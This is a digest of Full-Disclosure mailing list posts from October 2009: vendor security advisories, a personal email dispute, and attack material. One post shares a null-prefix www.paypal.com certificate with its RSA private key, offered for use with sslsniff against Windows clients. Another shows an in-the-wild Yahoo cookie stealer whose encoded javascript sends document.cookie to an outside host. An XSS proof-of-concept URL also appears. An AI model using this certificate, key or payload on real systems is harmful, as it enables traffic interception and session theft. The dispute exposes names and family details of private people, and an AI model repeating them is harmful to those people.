[Full-disclosure] GV-2009-01 : Cross-Site Scripting flaw in AfterLogic WebMail Pro
Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro Description - AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection of malicious code in the context of the application. Overview --- Quote from http://www.afterlogic.com/products/webmail-pro : "Webmail front-end for your existing POP3/IMAP mail server. Offer your users the fast AJAX webmail and innovative calendar with sharing. Stay in control with the admin panel and the developer's API." Details Vulnerable Product : AfterLogic WebMail Pro <= 4.7.10 Vulnerability Type : Cross-Site Scripting (XSS) Affected page : history-storage.aspx Vulnerable parameters : HistoryKey, HistoryStorageObjectName Discovered by : Sébastien Duquette (http://intheknow-security.blogspot.com) Gardien Virtuel (www.gardienvirtuel.com) Original Advisory : http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt Timeline -- Bug Discovered : September 18th, 2009 Vendor Advised : September 23rd, 2009 Fix made available : September 30th, 2009 Proof of concept --- The targeted user must be logged in the webmail. This proof of concept was successfully tested in Firefox 3.5 and Internet Explorer 8. http://WEBSITE/history-storage.aspx?param=0.21188772204998574"; onSubmit="return false;"> Solution - The vendor has made available a patched version. Update to AfterLogic Webmail Pro 4.7.11 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory: Cross-Site Scripting flaw in AfterLogic WebMail Pro
Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro Description - AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection of malicious code in the context of the application. Overview --- Quote from http://www.afterlogic.com/products/webmail-pro : "Webmail front-end for your existing POP3/IMAP mail server. Offer your users the fast AJAX webmail and innovative calendar with sharing. Stay in control with the admin panel and the developer's API." Details Vulnerable Product : AfterLogic WebMail Pro <= 4.7.10 Vulnerability Type : Cross-Site Scripting (XSS) Affected page : history-storage.aspx Vulnerable parameters : HistoryKey, HistoryStorageObjectName Discovered by : Sébastien Duquette (http://intheknow-security.blogspot.com) Gardien Virtuel (www.gardienvirtuel.com) Original Advisory : http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt Timeline -- Bug Discovered : September 18th, 2009 Vendor Advised : September 23rd, 2009 Fix made available : September 30th, 2009 Proof of concept --- The targeted user must be logged in the webmail. This proof of concept was successfully tested in Firefox 3.5 and Internet Explorer 8. http://WEBSITE/history-storage.aspx?param=0.21188772204998574"; onSubmit="return false;"> Solution - The vendor has made available a patched version. Update to AfterLogic Webmail Pro 4.7.11 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-841-1] GLib vulnerability
=== Ubuntu Security Notice USN-841-1 October 05, 2009 glib2.0 vulnerability CVE-2009-3289 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libglib2.0-02.16.6-0ubuntu1.2 Ubuntu 8.10: libglib2.0-02.18.2-0ubuntu2.2 Ubuntu 9.04: libglib2.0-02.20.1-0ubuntu2.1 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: Arand Nash discovered that applications linked to GLib (e.g. Nautilus) did not correctly copy symlinks. If a user copied symlinks with GLib, the symlink target files would become world-writable, allowing local attackers to gain access to potentially sensitive information. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6-0ubuntu1.2.diff.gz Size/MD5:36482 5a747f19839228824de8b801306697b1 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6-0ubuntu1.2.dsc Size/MD5: 1168 b073d48a3ef03f58d58a647ba6bc5152 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6.orig.tar.gz Size/MD5: 6491460 65c594a471406a377bee8171a2ea43d4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-doc_2.16.6-0ubuntu1.2_all.deb Size/MD5: 1131446 3554e3c1d7ff9e967b2a70118ed269d0 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-data_2.16.6-0ubuntu1.2_all.deb Size/MD5: 968 8b2ba86fa2ce1c1ce6f87449a29ba398 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_amd64.deb Size/MD5: 1177628 74b9bb38332276d8f27e84a2a989923c http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_amd64.deb Size/MD5: 824766 5d60a5bbee4bb5f5a503cf17b6b968d8 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_amd64.deb Size/MD5: 985446 30a551102c0dc05911b28d18f09094e2 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_amd64.deb Size/MD5:48396 5fbd8935fc8cdfbc87ddee9dd5ea906e http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_amd64.udeb Size/MD5: 1307488 0e797f76924ae31a0a54f596207c1c18 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_i386.deb Size/MD5: 1102278 322adce90ad9052eb05e97acb2bb3aed http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_i386.deb Size/MD5: 758442 d60d1a00d850acc2bf29301d2e708c94 http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_i386.deb Size/MD5: 872458 21872fd8706eccc3260906e9e18b81f6 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_i386.deb Size/MD5:46706 5e4456b1527efd940e01c7aca7c65072 http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_i386.udeb Size/MD5: 1241052 ca6659a5062d06e9f95a794d25aa0bec lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_lpia.deb Size/MD5: 1126498 a8cf538453e395b610fd43a0e1d3995c http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_lpia.deb Size/MD5: 749728 b8ab5b52627b33a02dc628518f6e8cc1 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_lpia.deb Size/MD5: 866292 d24055f7c9b3c22743b23b1db647f8c8 http://ports.ubuntu.com/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_lpia.deb Size/MD5:46612 7b5d6df79a5cc8a2a776b0c67b30a889 http://ports.ubuntu.com/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_lpia.udeb Size/MD5: 1232302 fafbeb120762dfb6b82d401106729d21 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_powerpc.deb Size/MD5: 1166088 050d4dd8978470c1093993d6c90e596a http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_powerpc.deb Size/MD5: 825162 ecffe44dd39ccfd545503ca4a71fa7e0 http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_powerpc.deb Size/MD5: 1033488 700541c029701259dd63002d839e6b58 http://ports.u
[Full-disclosure] null-prefix certificate for paypal
If there's really a Moxie Marlinspike fan club [1], I'm definitely a member.. Attached is one of the null-prefix certificates [2] that he distributed during his "intercepting secure communication" training at Black Hat. This one's for www.paypal.com, and since the Microsoft crypto api appears to remain unpatched, it works flawlessly with sslsniff [3] against all clients on Windows (IE, Chrome, Safari). Also, because of Moxie's attacks against OCSP [4], I don't think this certificate can be revoked. Enjoy! [1]: http://www.linuxtoday.com/security/2009100102035NWNT [2]: http://www.thughtcrime.org/papers/null-prefix-attacks.pdf [3]: http://www.thoughtcrime.org/software/sslsniff/ [4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf -BEGIN CERTIFICATE- MIIGRDCCBa2gAwIBAgIDAPCbMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3 DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwMjI0MjMwNDE3WhcNMTEwMjI0 MjMwNDE3WjCBlDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU BgNVBAcTDVNhbiBGcmFuY2lzY28xETAPBgNVBAoTCFNlY3VyaXR5MRQwEgYDVQQL EwtTZWN1cmUgVW5pdDEvMC0GA1UEAxMmd3d3LnBheXBhbC5jb20Ac3NsLnNlY3Vy ZWNvbm5lY3Rpb24uY2MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJp+m86 ALQhG8ixAtc/GbLEbbRU+IuKzNtywp48YLnGkT2Ct32Z/9EphMFzU5yC3fwkjHfV QfPoHkKhrS2e/1sQJs6dVxdzFiM4yNbxuqOWWxZnSk9zlzpNFKT04j+LBYNC0dDc L3rlthCyEcDcISqQ/66XcVpJgaxA8zu4WbJPAgMBAAGjggMhMIIDHTAJBgNVHR ME AjAAMBEGCWCGSAGG+EIBAQQEAwIGQDALBgNVHQ8EBAMCA/gwEwYDVR0lBAwwCgYI KwYBBQUHAwEwHQYDVR0OBBYEFGGPYTRDVRR/JwnOTIvqm3sZJbxuMB8GA1UdIwQY MBaAFA4HYNQ5yRtbXZB7I8jSNJ1KmkY5MAkGA1UdEQQCMAAwHAYDVR0SBBUwE4ER Z2VuZXJhbEBpcHNjYS5jb20wcgYJYIZIAYb4QgENBGUWY09yZ2FuaXphdGlvbiBJ bmZvcm1hdGlvbiBOT1QgVkFMSURBVEVELiBDTEFTRUExIFNlcnZlciBDZXJ0aWZp Y2F0ZSBpc3N1ZWQgYnkgaHR0cHM6Ly93d3cuaXBzY2EuY29tLzAvBglghkgBhvhC AQIEIhYgaHR0cHM6Ly93d3cuaXBzY2EuY29tL2lwc2NhMjAwMi8wQwYJYIZIAYb4 QgEEBDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAy Q0xBU0VBMS5jcmwwRgYJYIZIAYb4QgEDBDkWN2h0dHBzOi8vd3d3Lmlwc2NhLmNv bS9pcHNjYTIwMDIvcmV2b2NhdGlvbkNMQVNFQTEuaHRtbD8wQwYJYIZIAYb4QgEH BDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvcmVuZXdhbENMQVNF QTEuaHRtbD8wQQYJYIZIAYb4QgEIBDQWMmh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9p cHNjYTIwMDIvcG9saWN5Q0xBU0VBMS5odG1sMIGDBgNVHR8EfDB6MDmgN6A1hjNo dHRwOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAyQ0xBU0VBMS5j cmwwPaA7o DmGN2h0dHA6Ly93d3diYWNrLmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBz Y2EyMDAyQ0xBU0VBMS5jcmwwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZo dHRwOi8vb2NzcC5pcHNjYS5jb20vMA0GCSqGSIb3DQEBBQUAA4GBAGjueZeX3Tvv FmoG8hSabs2eEveqgxC90XyY+seu1A4snjgFnVJgqZkKgbSYkB2uu0rXudyInjd4 QVv3gqXyukElWpAaHkU4oVJYdZQmRPsgB7pEzOVKLXI/mEf2JtwFRgUHYyGrRpuc eNVUWz0MHshkjLVQI4Jv27giHEOWB6i7 -END CERTIFICATE- -BEGIN RSA PRIVATE KEY- MIICXQIBAAKBgQDSafpvOgC0IRvIsQLXPxmyxG20VPiLiszbcsKePGC5xpE9grd9 mf/RKYTBc1Ocgt38JIx31UHz6B5Coa0tnv9bECbOnVcXcxYjOMjW8bqjllsWZ0pP c5c6TRSk9OI/iwWDQtHQ3C965bYQshHA3CEqkP+ul3FaSYGsQPM7uFmyTwIDAQAB AoGAcqDnnOaVcYxD7Z55NLgckOYv+bj8ulCAb+DiI4AzFaIWh9MJkXRvCAy9VQI1 /6LPukhS+gmE55KBwb0AckUXSRC4DuPXOhgT6ywyEJGQp6IdaQmC4NoyC+G4GPnr h0YISVKTT1ppRgjF6tpaFvElGTse+yejtKAssduT45MoxGkCQQDx58UFfPCVwAho J7/4TXpEebYs/BuLKYwQKUuQe1B+dV2WtSaub+jbSSpRVScTpyfKRwN0w4UZzs/6 4Zzs/erbAkEA3qx8uhMy7Dxu8zWx+C1b5LSh4Rf4sCvXug/nx3opvahO89iP5P6L MVplaVsVPwligUEaMsx9rJEJvt48sMEenQJBAOQlE6MOZ5TETOl2e84BvEuygodA qfWAlLF1UOgN9SefJ0oIxVeFAhc2lOuqJLWbU6KpgO/xqqlhbLOPbsHw5DsCQDj0 j5acsIrCTnLBCjt7hqSyGzHTCtYs8KnzxYo9Ug3jzgYLH4soHHxMLeJL3NxZzytW dpgFvCN2mbKLb6SaUPUCQQCKjbXoN7DkBbk8wU0ZY5fGCtLEUHtEmT93nFgmUvQ3 ZSB/EvhtWRPcWGdRC5tj0YxaUFevVhZA/Ng1d1JzbcKB -END RSA PRIVATE KEY- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1902-1] New elinks packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1902-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff October 05, 2009 http://www.debian.org/security/faq - Package: elinks Vulnerability : buffer overflow Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2008-7224 Debian Bug : 380347 Jakub Wilk discovered an off-by-one buffer overflow in the charset handling of elinks, a feature-rich text-mode WWW browser, which might lead to the execution of arbitrary code if the user is tricked into opening a malformed HTML page. For the old stable distribution (etch), this problem has been fixed in version 0.11.1-1.2etch2. The stable distribution (lenny) and the unstable distribution (sid) already contain a patch for this problem. We recommend that you upgrade your elinks package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2.diff.gz Size/MD5 checksum:30564 48727476dbfed45200797a0504fa6e4a http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1.orig.tar.gz Size/MD5 checksum: 3863617 dce0fa7cb2b6e7194ddd00e34825218b http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2.dsc Size/MD5 checksum: 872 870acbbc16c166c0e17669f435cf4478 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_alpha.deb Size/MD5 checksum: 496748 65a9e90caf0005912d0f307447bb7252 http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_alpha.deb Size/MD5 checksum: 1264746 750b9c9425d331afdd84ae9e8ec397cc amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_amd64.deb Size/MD5 checksum: 457658 d35d0729240a9a3e4edf596fab8b5519 http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_amd64.deb Size/MD5 checksum: 1219062 eeb677af4bd1f969062dcc49a6c5797f arm architecture (ARM) http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_arm.deb Size/MD5 checksum: 1179258 2236eef0018c35106157254f1a9b5371 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_arm.deb Size/MD5 checksum: 417026 d6298439e61cfd390dc5f885fa6d3ce9 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_hppa.deb Size/MD5 checksum: 1249718 200ea460bf1c50c7c77fb818b99d6f93 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_hppa.deb Size/MD5 checksum: 481296 4d1ffd49415dc0f727fec71843e0cf1e i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_i386.deb Size/MD5 checksum: 423782 fd2bdd5f8d85049dd34e9d392cfb0d55 http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_i386.deb Size/MD5 checksum: 1188386 6b5bd5cc0801cc98c5f89eb755036a58 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_ia64.deb Size/MD5 checksum: 1432996 3f1c8fd354685e153aa0bf6001811f72 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_ia64.deb Size/MD5 checksum: 624264 6ab1d3d6329c2fbbd366c7979846be04 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_mipsel.deb Size/MD5 checksum: 1223924 88dab6a6625382e7d7531f9f45f2fb6d http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_mipsel.deb Size/MD5 checksum: 466916 3f54531dc562935768748e8626c3cd8a powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_powerpc.deb Size/MD5 checksum: 450082 4cb3cbeda69cd02ddc99b132d26998c5 http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_powerpc.deb Size/MD5 checksum: 1216856 ed85e75381a7bfdd094e21e0e16ecbfd s390 architecture (IBM
[Full-disclosure] Yahoo cookie stealer
Found in the wild: http://funny.byethost16.com Redirects to: http://kr.gugi.yahoo.com/myBook/myregion.php?func_mode=loginAction&targetUrl=javascript:document.location=String.fromCharCode(104,116,116,112,58,47,47,102,117,110,110,121,46,98,121,101,116,104,111,115,116,49,54,46,99,111,109,47,105,110,100,101,120,46,112,104,112,63,105,115,114,61).concat(escape(document.cookie)); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1901-1] New mediawiki1.7 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1901-1 secur...@debian.org http://www.debian.org/security/ Giuseppe Iuculano October 05, 2009 http://www.debian.org/security/faq - Package: mediawiki1.7 Vulnerability : several vulnerabilities Problem type : remote Debian-specific: no CVE IDs: CVE-2008-5249 CVE-2008-5250 CVE-2008-5252 CVE-2009-0737 Debian Bugs: 508868 508869 508870 514547 Several vulnerabilities have been discovered in mediawiki1.7, a website engine for collaborative work. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-5249 David Remahl discovered that mediawiki1.7 is prone to a cross-site scripting attack. CVE-2008-5250 David Remahl discovered that mediawiki1.7, when Internet Explorer is used and uploads are enabled, or an SVG scripting browser is used and SVG uploads are enabled, allows remote authenticated users to inject arbitrary web script or HTML by editing a wiki page. CVE-2008-5252 David Remahl discovered that mediawiki1.7 is prone to a cross-site request forgery vulnerability in the Special:Import feature. CVE-2009-0737 It was discovered that mediawiki1.7 is prone to a cross-site scripting attack in the web-based installer. For the oldstable distribution (etch), these problems have been fixed in version 1.7.1-9etch1 for mediawiki1.7, and mediawiki is not affected (it is a metapackage for mediawiki1.7). The stable (lenny) distribution does not include mediawiki1.7, and these problems have been fixed in version 1:1.12.0-2lenny3 for mediawiki which was already included in the lenny release. The unstable (sid) and testing (squeeze) distributions do not include mediawiki1.7, and these problems have been fixed in version 1:1.14.0-1 for mediawiki. We recommend that you upgrade your mediawiki1.7 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1.dsc Size/MD5 checksum: 911 7db727bfa3f6139e107af451a90df719 http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1.orig.tar.gz Size/MD5 checksum: 3256428 50b74e2b5c86fb94c7201b72d2037662 http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1.diff.gz Size/MD5 checksum:46880 f939cc99afd3ff4b330a35ce549fdd7e Architecture independent packages: http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1_all.deb Size/MD5 checksum: 3341486 4d801e5ee141c2affd080437cafa7f0f alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_alpha.deb Size/MD5 checksum: 180506 526bd0d52438515635abc44afea9e618 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_amd64.deb Size/MD5 checksum: 137638 b63b1cd4bc45683507e765b5af1aea12 arm architecture (ARM) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_arm.deb Size/MD5 checksum: 140018 a9431b5e427703486a814ed2a7442d62 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_hppa.deb Size/MD5 checksum:42988 0a7a434f0fcc81b7d8d5e80137ca6569 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_i386.deb Size/MD5 checksum: 122238 cc04873698abdbf03011336f533c2b06 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_ia64.deb Size/MD5 checksum: 231730 e3201066e1de24dc9a13d284ea4b685f mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_mips.deb Size/MD5 checksum:42978 e92b925866416643905a835ab0a5ae2b mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9
Re: [Full-disclosure] (No subject) legal threat from Alyse Auernheimer
Sorry about leaving sealpac in there, we're working on correcting that. I'll put a notice in the next one. For the record, the post made in an earlier version of Andrew Auernheimer's infodoc states weev has an affiliation with sealpac. This is incorrect because weev just took the domain name and failed to give it back. Since you find is necessary to forward this correspondence to the FBI, I'll make it public here for you. It's almost like you're fishing to be a victim or something. It's pathetic. If it means anything: No one has made any threats to you. No one is going to harm you. No one has any ill-sentiment towards your family. You've been done a favor by having your relationship with weev clarified on here. You got your correction, you got your post down, quit being melodramatic. On Mon, 05 Oct 2009 07:50:20 + Alyse Auernheimer wrote: Return-Path: Received: from smtp7.hushmail.com (smtp7.hushmail.com [65.39.178.136]) by imap12.hushmail.com (Cyrus v2.3.7-Invoca-RPM-2.3.7-2.el5) with LMTPA; Mon, 05 Oct 2009 07:50:29 + X-Sieve: CMU Sieve 2.3 Received: from mail-ew0-f224.google.com (mail-ew0-f224.google.com [209.85.219.224]) by smtp7.hushmail.com (Postfix) with ESMTP for ; Mon, 5 Oct 2009 07:50:21 + (UTC) Received: by ewy24 with SMTP id 24so11122764ewy.22 for ; Mon, 05 Oct 2009 00:50:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message- id:subject :from:to:content-type; bh=O+UD/WD8lCH2KA1S8ZiYbDmjoHo36/uRUHWULElbv7c=; b=N9iZNiKyHiM6Sso//SeBju/siqip/Kl3QGZ1kBFI6HY0Npx0TU4suw4PixASzY5EdO Mfq8Gc6SEQAaPBmtRv+EPoCENWkaKMg21oRkzgaCwZ90QFnfu7K/H4mfuZHkXehS9irP XL273nm8NSog6o7XfyATtsN+2TVdFvwYC6B0w= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=HfCFSLplV0dZpvp5Pmk5aqBRGbsW4KwixRJ0KmZHItZhIJkeVGLWeHMPqyBtE3nkg5 4XlDiotqE/V0398MMiRyzreqiHrufXjkTdzAYnK1KBHA1pBje2dtlM6l/ICwS+fuLiLt 9HubIoKXLS126A9FQOYCxML9lQ1qG/DdROv8I= MIME-Version: 1.0 Received: by 10.216.87.144 with SMTP id y16mr622378wee.95.1254729020908; Mon, 05 Oct 2009 00:50:20 -0700 (PDT) Date: Mon, 5 Oct 2009 03:50:20 -0400 Message-ID: <4f8170520910050050v1d44b4d8p6ad4202ac4dc5...@mail.gmail.com> Subject: From: Alyse Auernheimer To: TheLearner Content-Type: multipart/alternative; boundary=0016e6d7852e94a5d104752b5dda Lisa, Please do not link Andrew Auernheimer with our business, Sealpac USA, he has nothing to do with it except he is holding our domain name hostage. We are planning on pursuing a court order to have it released. All of our emails concerning this subject will now be forwarded to the FBI as it may potentially impact our business. The individuals who say they are trying to help us are now causing more harm to us than Andrew himself. We are advised to have our home watched by law enforcement and our daughter's dorm. This is just wrong. Thank You for you consideration. Alyse ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/